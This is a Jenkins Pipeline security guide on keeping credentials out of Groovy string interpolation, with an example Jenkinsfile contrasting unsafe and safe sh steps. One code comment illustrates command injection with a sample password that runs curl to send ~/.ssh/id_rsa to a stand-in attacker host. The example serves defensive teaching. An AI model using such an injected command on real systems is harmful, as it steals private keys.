The job of securing the Jenkins instance falls mostly on administrators, but Pipeline authors must also adhere to good security practices. We summarize these here.
If your Pipeline needs to access external resources such as a database, artifact repository, or cloud provider, use the Jenkins credentials store for authentication rather than hard-coding the username/password, secret text, or other identifiers in your Pipeline. See Using Credentials for more information.
Understand Groovy string interpolation, and be very careful when passing sensitive data such as environment variables that hold credentials.

Never enclose sensitive environment variables in double quotes. Data inside double quotes is subject to Groovy string interpolation: Groovy evaluates the string on the controller and substitutes the actual secret value into the command text before it reaches the sh or bat step (or any other facility). The secret then becomes part of the script itself, where it can be echoed to the console log (the sh step echoes each command by default) and, if it contains shell metacharacters, can change the meaning of the command.

Data enclosed in single quotes is not interpolated by Groovy. The string is passed unchanged to the interpreter (sh, bat, powershell, or pwsh), which expands the variable at run time from the process environment, so the secret value never enters the Groovy-evaluated command text. This is the safe form.

See Interpolation of sensitive environment variables and Injection via interpolation for more details.
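The following Jenkinsfile is an added example, not code from the Jenkins handbook, showing the unsafe double-quoted form beside the safe single-quoted form. It assumes a Username with password credential with ID `artifactory-deploy` exists on the controller and that `https://repo.example.com/app.jar` is the upload target; both are placeholders.

```groovy
// Added example (not from the Jenkins handbook). Assumes a Username/Password
// credential with ID 'artifactory-deploy' and the repository URL below (both assumed).
pipeline {
    agent any
    stages {
        stage('Publish') {
            steps {
                withCredentials([usernamePassword(credentialsId: 'artifactory-deploy',
                                                  usernameVariable: 'ART_USER',
                                                  passwordVariable: 'ART_PASS')]) {
                    // UNSAFE: Groovy interpolates ${ART_PASS} on the controller before the
                    // sh step runs, so the literal secret becomes part of the script text.
                    // It can be echoed to the console log, and a password such as
                    //   '; curl -d @~/.ssh/id_rsa https://attacker.example/; echo '
                    // would be executed as shell syntax. Kept commented out on purpose.
                    // sh "curl -u ${ART_USER}:${ART_PASS} -T app.jar https://repo.example.com/app.jar"

                    // SAFE: single quotes keep $ART_USER and $ART_PASS as literal text in the
                    // Groovy string. The shell expands them at run time from the environment
                    // that withCredentials injected, so the values never enter the script text.
                    // Quoting the expansion also prevents word splitting on spaces in the secret.
                    sh 'curl -u "$ART_USER:$ART_PASS" -T app.jar https://repo.example.com/app.jar'
                }
            }
        }
    }
}
```

The same rule applies to bat, powershell, and pwsh: write the variable in the interpreter's own syntax (for example `%ART_PASS%` or `$env:ART_PASS`) inside a single-quoted Groovy string so the interpreter, not Groovy, performs the expansion. Recent Jenkins versions print a warning in the build log when a secret is passed to a step through Groovy string interpolation; treat that warning as a defect to fix, not noise.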